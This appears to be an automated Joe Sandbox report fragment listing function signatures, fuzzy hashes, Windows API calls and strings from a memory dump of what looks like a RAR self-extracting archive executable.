                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                  • API String ID: 667068680-1718035505
                                                                                  • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                  • Instruction ID: 9355d6f33a45706f81db5d20be013696177973c6ca1d8dcfb44aed66e3c6d3a1
                                                                                  • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                  • Instruction Fuzzy Hash: 24115E20E0AB4381FEA5AFC0A940A74E7E16F18790FCD84B9CA5D46390FE3CB5468670
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AAB51A4: GetVersionExW.KERNEL32 ref: 00007FF75AAB51D5
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF75AAA5AB4), ref: 00007FF75AABED8C
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF75AAA5AB4), ref: 00007FF75AABED98
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF75AAA5AB4), ref: 00007FF75AABEDA8
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF75AAA5AB4), ref: 00007FF75AABEDB6
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF75AAA5AB4), ref: 00007FF75AABEDC4
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF75AAA5AB4), ref: 00007FF75AABEE05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                  • Instruction ID: 7a999896b38da61c721cf8c682bb86f8b65dc3d7087a9f382a1b3ceea0ce81e3
                                                                                  • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                  • Instruction Fuzzy Hash: D8518AB2B006558AFB14DFB8D4405AC7BB1FB48B88BA4403ADE1D67B58DF38E946C710
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                  • Instruction ID: 935bbd3c12de9635d50b96cf8e8b324365d627a649f1500761f79761b22efda5
                                                                                  • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                  • Instruction Fuzzy Hash: D0311B62B10A5189FB04DFF5E8805AC7770FF18758B98503ADE1D97A58EB38D896C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                  • API String ID: 3668304517-630704357
                                                                                  • Opcode ID: f48e310f2d4c6838760fd8124c0dfc7220e7dc8c7a549aff28db8dcc178fbc20
                                                                                  • Instruction ID: b314da5000451fe516cae193b7adfe98a2b18b72a63dffa2c6095393ba161a3e
                                                                                  • Opcode Fuzzy Hash: f48e310f2d4c6838760fd8124c0dfc7220e7dc8c7a549aff28db8dcc178fbc20
                                                                                  • Instruction Fuzzy Hash: E2A1E322A0570A80FB05BFA5D441ABCA361BF55B98F980275CD5D076E9DF7CE943C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 2889003569-2084237596
                                                                                  • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                  • Instruction ID: c3659e445e382abcbcb6ece9d8dd49cabaf3f7bb87f10726e95398e010644281
                                                                                  • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                  • Instruction Fuzzy Hash: CF91B273A08B828AF750EFA5D4406ADBBA0FB48788F58413AEE8D17755DF38D196C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                  • String ID: csm$f
                                                                                  • API String ID: 2395640692-629598281
                                                                                  • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                  • Instruction ID: 68930b8e202f7c058f78a20e406fdff9bbeb8004479920fcc19b57e35e12360b
                                                                                  • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                  • Instruction Fuzzy Hash: 0B51D831A196038AF794FB51E444E29B765FF40B84F9880B4EA9E47748DF78E842C750
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                  • API String ID: 2102711378-639343689
                                                                                  • Opcode ID: 2b861648b180918fd0f02cdc83054ab275c6740b5d877ad0ce6218155adf80f7
                                                                                  • Instruction ID: 809f7ed0ac96347168ba989611b22be4b68c25b1e0035e1071708dba2ed9d197
                                                                                  • Opcode Fuzzy Hash: 2b861648b180918fd0f02cdc83054ab275c6740b5d877ad0ce6218155adf80f7
                                                                                  • Instruction Fuzzy Hash: CE51E762F0478145FB10FBE4D841ABDA7A1BF947A4F880175DE5D13695EF3CA887C2A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Rect
                                                                                  • String ID: RarHtmlClassName
                                                                                  • API String ID: 2396740005-1658105358
                                                                                  • Opcode ID: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                  • Instruction ID: a75c3aaf1e4571dfcc90ad3249537b2c5a935b3c4ee660cc55957bbde1d88fd3
                                                                                  • Opcode Fuzzy Hash: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                  • Instruction Fuzzy Hash: 43519421A09742CAFB25EB61E454B7AE7A0FF85780F884075EE8E47B55DF3CE0468710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: sfxcmd$sfxpar
                                                                                  • API String ID: 3540648995-3493335439
                                                                                  • Opcode ID: 9cd6036ae86cdbcd8d8a5aead61c32137b442908135497355496b2fd8e337c0a
                                                                                  • Instruction ID: 9f2f80c7adcc986b12539219d7e7b1404806011c1361e909ddf98685ac247c66
                                                                                  • Opcode Fuzzy Hash: 9cd6036ae86cdbcd8d8a5aead61c32137b442908135497355496b2fd8e337c0a
                                                                                  • Instruction Fuzzy Hash: 9531A332A14B0584FB04ABA5E4946AC7371FF58B88F980176DE5D177A9DE3CD042C364
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                  • API String ID: 0-56093855
                                                                                  • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                  • Instruction ID: 8973b1e60433c0624f24da484eb470549f2d72e38d2ac2443857849d6aba7e60
                                                                                  • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                  • Instruction Fuzzy Hash: 69211B61908B4780FA10AB59F858978F7A0FF49B84F9C01B6E94D43364DE3CE496C3A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                  • Instruction ID: 89dc542acd097aaebfb60acb2c8b8cf0054d0490f76f2aaa9dc96bad2b474d97
                                                                                  • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                  • Instruction Fuzzy Hash: C0F04F21A19A4281FE84AFA1E850A79A7A0EF9C790FCC1079D94F46665DE3CE4868720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                  • Instruction ID: c1e65040b35b512b5e677145ef3ced987e3a1ca9ec542acc72184885994a1ee8
                                                                                  • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                  • Instruction Fuzzy Hash: C281C362F1865246F750ABB59840ABDF7A9BF65B84F8841B9CE0E13695CF3DA443C330
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2398171386-0
                                                                                  • Opcode ID: c0b6f85d6e607c1b1f7522d8fb8fca2e4b31be8c2fa13c4f1724a84f069d023c
                                                                                  • Instruction ID: 7935e9051222fcd65d27f4866de341371b7a28667a6f0eb94bac5895da1186fc
                                                                                  • Opcode Fuzzy Hash: c0b6f85d6e607c1b1f7522d8fb8fca2e4b31be8c2fa13c4f1724a84f069d023c
                                                                                  • Instruction Fuzzy Hash: 2951E722B04B4699FB50EBF5E440BBDA371AF44798F884675DE1D47BD9DE38980AC320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 3659116390-0
                                                                                  • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                  • Instruction ID: d15b52b991b8419de8700b82d8503a6f81acb12340ddd9990356f0c77362e4fc
                                                                                  • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                  • Instruction Fuzzy Hash: A551D032A14A518AFB10DBB5D4407ACBBB4BF58798F488139CF4A57B99CF39D146C320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 262959230-0
                                                                                  • Opcode ID: b7eca4d0914b4f3ce7b9457829877c74e6e00994a5cd88f9d96bed53318f8e63
                                                                                  • Instruction ID: a76d2f49531a63ffbc7b86aaaefdbb1994edda69a7e43577a72766cf4ac070d7
                                                                                  • Opcode Fuzzy Hash: b7eca4d0914b4f3ce7b9457829877c74e6e00994a5cd88f9d96bed53318f8e63
                                                                                  • Instruction Fuzzy Hash: 8541D331A0974689FB94AFA19440B78A3D1EF08BA4F9C4675EAAD877D5DF3CD0438320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                  • Instruction ID: f184689e11c09c5781d5fe40152fac359e324b8ce4fbea188852d677999c7e88
                                                                                  • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                  • Instruction Fuzzy Hash: 12415B61B09A0281FE95AF92A900D7AE791BF18BD0F9D4979DD5E4B744EF3CE0028320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
